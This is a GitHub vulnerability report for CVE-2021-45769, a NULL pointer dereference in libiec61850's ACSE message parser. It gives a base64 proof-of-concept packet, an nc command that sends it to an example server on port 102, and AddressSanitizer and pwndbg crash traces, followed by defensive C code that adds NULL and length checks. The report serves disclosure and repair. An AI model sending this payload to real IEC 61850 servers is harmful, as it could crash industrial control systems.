CVE-2021-45769: NULL Pointer Dereference in AcseConnection_parseMessage · Issue #368 · mz-automation/libiec61850

A NULL pointer dereference in AcseConnection_parseMessage at src/mms/iso_acse/acse.c of libiec61850 v1.5.0 can lead to a segmentation fault or application crash.

NULL Pointer Dereference in AcseConnection_parseMessage

Description

A NULL Pointer Dereference was discovered in AcseConnection_parseMessage at src/mms/iso_acse/acse.c:429. The vulnerability causes a segmentation fault and application crash.

version

8eeb6f0

System information
Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz

Proof of Concept

poc

base64 poc
AwAAFgLwgA0NAQDBATGBAgABogIAAA==

command:

./server_example_basic_io
nc 0.0.0.0 102 < poc

Result

./server_example_basic_io
Using libIEC61850 version 1.5.0
Connection opened
AddressSanitizer:DEADLYSIGNAL
=================================================================
==4028537==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x55de6e46db68 bp 0x7fac36efcaa0 sp 0x7fac36efc9f0 T3)
==4028537==The signal is caused by a READ memory access.
==4028537==Hint: address points to the zero page.
    #0 0x55de6e46db67 in AcseConnection_parseMessage src/mms/iso_acse/acse.c:429
    #1 0x55de6e41960b in IsoConnection_handleTcpConnection src/mms/iso_server/iso_connection.c:233
    #2 0x55de6e41ac5d in handleTcpConnection src/mms/iso_server/iso_connection.c:472
    #3 0x7fac3b7e3608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477
    #4 0x7fac3b5bb292 in __clone (/lib/x86_64-linux-gnu/libc.so.6+0x122292)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/mms/iso_acse/acse.c:429 in AcseConnection_parseMessage
Thread T3 created by T1 here:
    #0 0x7fac3b837805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
    #1 0x55de6e3b19dc in Thread_start hal/thread/linux/thread_linux.c:89
    #2 0x55de6e41b4f7 in IsoConnection_start src/mms/iso_server/iso_connection.c:581
    #3 0x55de6e417bf1 in handleIsoConnections src/mms/iso_server/iso_server.c:520
    #4 0x55de6e417c99 in isoServerThread src/mms/iso_server/iso_server.c:554
    #5 0x7fac3b7e3608 in start_thread /build/glibc-eX1tMB/glibc-2.31/nptl/pthread_create.c:477

Thread T1 created by T0 here:
    #0 0x7fac3b837805 in pthread_create (/lib/x86_64-linux-gnu/libasan.so.5+0x3a805)
    #1 0x55de6e3b19dc in Thread_start hal/thread/linux/thread_linux.c:89
    #2 0x55de6e4182d2 in IsoServer_startListening src/mms/iso_server/iso_server.c:682
    #3 0x55de6e3b9b50 in MmsServer_startListening src/mms/iso_mms/server/mms_server.c:606
    #4 0x55de6e3adae9 in IedServer_start src/iec61850/server/impl/ied_server.c:692
    #5 0x55de6e39537e in main /root/disk2/fuzzing/libiec61850/test/libiec61850/examples/server_example_basic_io/server_example_basic_io.c:146
    #6 0x7fac3b4c00b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)

==4028537==ABORTING

gdb

Using libIEC61850 version 1.5.0
[New Thread 0x7ffff3bff700 (LWP 4048010)]
[New Thread 0x7ffff33fe700 (LWP 4048011)]
Connection opened
[New Thread 0x7ffff2bfd700 (LWP 4048307)]

Thread 4 "server_example_" received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7ffff2bfd700 (LWP 4048307)]
0x0000555555661b68 in AcseConnection_parseMessage (self=0x608000004020, message=0x6060000030a8) at src/mms/iso_acse/acse.c:429
429         uint8_t messageType = buffer[bufPos++];
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
────────────────────────────────────────────[ REGISTERS ]─────────────────────────────────────────────
 RAX  0x0
 RBX  0x7ffff2bfca20 ◂— 0x41b58ab3
 RCX  0x0
 RDX  0x0
 RDI  0x7ffff2bfca80 —▸ 0x7ffff2bfce60 ◂— 0x0
 RSI  0x0
 R8   0x0
 R9   0x32
 R10  0x40
 R11  0x0
 R12  0xffffe57f944 ◂— 0x0
 R13  0x7ffff2bfca20 ◂— 0x41b58ab3
 R14  0x7ffff2bfcb40 ◂— 0x41b58ab3
 R15  0x7ffff2bfcf80 ◂— 0x0
 RBP  0x7ffff2bfcaa0 —▸ 0x7ffff2bfce80 —▸ 0x7ffff2bfceb0 ◂— 0x0
 RSP  0x7ffff2bfc9f0 —▸ 0x6060000030a8 ◂— 0x0
 RIP  0x555555661b68 (AcseConnection_parseMessage+383) ◂— movzx  eax, byte ptr [rcx]
──────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────
 ► 0x555555661b68 <AcseConnection_parseMessage+383>    movzx  eax, byte ptr [rcx]
   0x555555661b6b <AcseConnection_parseMessage+386>    mov    byte ptr [rbp - 0x95], al
   0x555555661b71 <AcseConnection_parseMessage+392>    mov    ecx, dword ptr [rbp - 0x90]
   0x555555661b77 <AcseConnection_parseMessage+398>    mov    edx, dword ptr [rbp - 0x8c]
   0x555555661b7d <AcseConnection_parseMessage+404>    lea    rsi, [rdi - 0x40]
   0x555555661b81 <AcseConnection_parseMessage+408>    mov    rax, qword ptr [rbp - 0x88]
   0x555555661b88 <AcseConnection_parseMessage+415>    mov    rdi, rax
   0x555555661b8b <AcseConnection_parseMessage+418>    call   BerDecoder_decodeLength                <BerDecoder_decodeLength>

   0x555555661b90 <AcseConnection_parseMessage+423>    mov    dword ptr [rbp - 0x8c], eax
   0x555555661b96 <AcseConnection_parseMessage+429>    cmp    dword ptr [rbp - 0x8c], 0
   0x555555661b9d <AcseConnection_parseMessage+436>    jns    AcseConnection_parseMessage+448
       <AcseConnection_parseMessage+448>
──────────────────────────────────────────[ SOURCE (CODE) ]───────────────────────────────────────────
In file: /root/disk2/fuzzing/libiec61850/test/libiec61850/src/mms/iso_acse/acse.c
   424
   425     int messageSize = message->size;
   426
   427     int bufPos = 0;
   428
 ► 429     uint8_t messageType = buffer[bufPos++];
   430
   431     int len;
   432
   433     bufPos = BerDecoder_decodeLength(buffer, &len, bufPos, messageSize);
   434
──────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────
00:0000│ rsp     0x7ffff2bfc9f0 —▸ 0x6060000030a8 ◂— 0x0
01:0008│         0x7ffff2bfc9f8 —▸ 0x608000004020 ◂— 0x0
02:0010│         0x7ffff2bfca00 —▸ 0x7ffff2bfcb40 ◂— 0x41b58ab3
03:0018│         0x7ffff2bfca08 —▸ 0xa2310146 ◂— 0x0
04:0020│         0x7ffff2bfca10 —▸ 0x100000000 ◂— 0x0
05:0028│         0x7ffff2bfca18 ◂— 0x0
06:0030│ rbx r13 0x7ffff2bfca20 ◂— 0x41b58ab3
07:0038│         0x7ffff2bfca28 —▸ 0x5555556d71d8 ◂— '1 32 4 7 len:431'
────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────
 ► f 0   0x555555661b68 AcseConnection_parseMessage+383
   f 1   0x55555560d60c IsoConnection_handleTcpConnection+1422
   f 2   0x55555560ec5e handleTcpConnection+43
   f 3   0x7ffff7564609 start_thread+217
──────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> bt
#0  0x0000555555661b68 in AcseConnection_parseMessage (self=0x608000004020, message=0x6060000030a8) at src/mms/iso_acse/acse.c:429
#1  0x000055555560d60c in IsoConnection_handleTcpConnection (self=0x61100000ff40, isSingleThread=false) at src/mms/iso_server/iso_connection.c:233
#2  0x000055555560ec5e in handleTcpConnection (parameter=0x61100000ff40) at src/mms/iso_server/iso_connection.c:472
#3  0x00007ffff7564609 in start_thread (arg=<optimized out>) at pthread_create.c:477
#4  0x00007ffff733c293 in clone () at ../sysdeps/unix/sysv/linux/x86_64/clone.S:95
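The register dump above shows the faulting instruction reading `byte ptr [rcx]` with RCX equal to 0, i.e. the parser at acse.c:429 indexes `buffer[0]` while the buffer pointer is NULL, before any length or size check has run. The following C snippet is an added defensive example, not code from libiec61850 and not the fix the project shipped: it shows the guard a parser entry of this shape needs (reject a NULL or too-short message before the first read, and decode the BER length with bounds checks). `ByteBuffer`, `decode_length`, `parse_message_guarded` and `parse_len_or_reject` are hypothetical stand-ins; only `message->size` and the `buffer[bufPos++]` read come from the listing on this page, and the `buf` field name is an assumption.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical message container. The gdb listing shows the parser reading
 * message->size and then buffer[0]; the field name "buf" is an assumption. */
typedef struct {
    const uint8_t *buf;
    int size;
} ByteBuffer;

/* Bounds-checked BER length decoder (assumed shape, not the library's own
 * BerDecoder_decodeLength). Returns the position just after the length
 * octets, or -1 when the length is malformed or runs past maxBufPos. */
static int decode_length(const uint8_t *buffer, int *length, int bufPos, int maxBufPos)
{
    if (bufPos >= maxBufPos)
        return -1;

    uint8_t first = buffer[bufPos++];

    if (first & 0x80) {
        /* long form: low 7 bits give the number of following length octets */
        int lenOctets = first & 0x7f;
        if (lenOctets == 0 || lenOctets > 4 || bufPos + lenOctets > maxBufPos)
            return -1;
        uint32_t len = 0;
        for (int i = 0; i < lenOctets; i++)
            len = (len << 8) | buffer[bufPos++];
        if (len > 0x7fffffffu)   /* does not fit a non-negative int: reject */
            return -1;
        *length = (int)len;
    } else {
        *length = first;         /* short form */
    }

    /* the encoded length must fit inside the bytes actually received */
    if (*length > maxBufPos - bufPos)
        return -1;

    return bufPos;
}

/* Guarded parser entry: returns false instead of dereferencing when the
 * buffer is NULL or shorter than one tag octet plus one length octet. */
bool parse_message_guarded(const ByteBuffer *message, uint8_t *messageType, int *payloadLen)
{
    if (message == NULL || message->buf == NULL || message->size < 2)
        return false;

    const uint8_t *buffer = message->buf;
    int messageSize = message->size;
    int bufPos = 0;

    *messageType = buffer[bufPos++];   /* safe: size >= 2 was checked above */

    int len;
    bufPos = decode_length(buffer, &len, bufPos, messageSize);
    if (bufPos < 0)
        return false;

    *payloadLen = len;
    return true;
}

/* Convenience wrapper for tests and demos: the decoded payload length,
 * or -1 when the guarded parser rejects the input. */
int parse_len_or_reject(const uint8_t *data, int size)
{
    ByteBuffer msg = { data, size };
    uint8_t type;
    int len;
    return parse_message_guarded(&msg, &type, &len) ? len : -1;
}

int main(void)
{
    /* constructed inputs: tag 0x60 (ACSE AARQ) with a valid length,
     * a truncated message, and the NULL buffer case from the crash above */
    const uint8_t ok[] = { 0x60, 0x02, 0x01, 0x02 };
    const uint8_t truncated[] = { 0x60, 0x05 };

    printf("well-formed : %d\n", parse_len_or_reject(ok, (int)sizeof ok));
    printf("truncated   : %d\n", parse_len_or_reject(truncated, (int)sizeof truncated));
    printf("NULL buffer : %d\n", parse_len_or_reject(NULL, 4));
    return 0;
}
```

The two checks are independent: the NULL/size guard covers the fault on this page, while the length check in `decode_length` stops a well-formed-looking header from steering later reads past the end of the received bytes.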
